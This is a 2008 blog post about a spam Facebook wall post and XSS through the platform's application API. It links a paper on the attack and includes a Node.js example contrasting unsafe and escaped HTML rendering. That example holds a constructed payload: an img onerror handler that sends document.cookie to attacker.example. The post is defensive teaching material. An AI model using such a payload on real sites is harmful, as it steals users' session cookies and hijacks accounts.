Facebook and XSS – a sample in action! :P

By chrt00 at 9:16 pm on March 6, 2008 | 2 Comments

Today, I checked Facebook and got a spam wall post. I suspected it was an FB API + XSS exploit and looked into this matter. What a coincidence with the new project! =P

[screenshot: my wall!]

So after the first Google result I got a complete rundown on how to exploit someone's account via XSS.

http://www.cs.virginia.edu/felt/fbook/facebook-xss-censored.pdf

Turns out it is fairly simple to execute!

This shows how even the most trusted sites, where we share a great deal of personal information, can be manipulated into doing malicious things. It is one of the real weaknesses of social networking combined with an open application API: any JavaScript that gets into a page runs with the same access as the site's own scripts, so it can read the page, grab the session cookies, and call the API as the logged-in user. There is no private/public separation like the one we are accustomed to in traditional OOP to isolate injected code from the rest of the page.
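As an added example (not code from the original post, and not Facebook's code), here is the failure mode in miniature: a wall post that is concatenated straight into the page's HTML versus one that is output-encoded first. The spam post, the `attacker.example` host and the rendering functions are all constructed for this illustration; it runs under Node.js on strings rather than a live DOM, so it shows what markup the browser would receive, not the handler firing.

```javascript
// Added example: how a wall post turns into an XSS payload when it is
// concatenated into HTML, and how output encoding stops it.
// Runs under Node.js; the "wall" is a string of HTML rather than a live DOM.

// Constructed sample of a spammy wall post carrying a payload. In a browser the
// onerror handler would run in the victim's session with the same access as
// the site's own scripts: the DOM, document.cookie, and any API the page can
// call as the logged-in user (which is how a wall-post worm spreads).
const SPAM_POST = {
  author: 'Friendly Spammer',
  body: 'Check this out!! <img src="x" onerror="new Image().src=\'https://attacker.example/?c=\'+document.cookie">',
};

// Vulnerable rendering: user content is dropped straight into the markup,
// so the browser parses the <img> tag and fires its onerror handler.
function renderWallPostUnsafe(post) {
  return '<div class="wall-post"><b>' + post.author + '</b>: ' + post.body + '</div>';
}

// Encode the five characters that change meaning in HTML text and in
// double-quoted attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[ch]);
}

// Hardened rendering: every user-controlled value is encoded for the HTML
// text context it lands in, so the payload is displayed as literal text and
// never parsed as a tag.
function renderWallPostSafe(post) {
  return '<div class="wall-post"><b>' + escapeHtml(post.author) + '</b>: ' + escapeHtml(post.body) + '</div>';
}

// Stand-alone demo: print both renderings side by side.
console.log('UNSAFE: ' + renderWallPostUnsafe(SPAM_POST));
console.log('SAFE:   ' + renderWallPostSafe(SPAM_POST));
```

The hardened version only encodes for the HTML text context; a value placed inside a URL, a `<script>` block or an event handler attribute needs the encoding for that context instead, which is why templating engines that escape by default beat hand-rolled string concatenation.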

Filed under: Current Events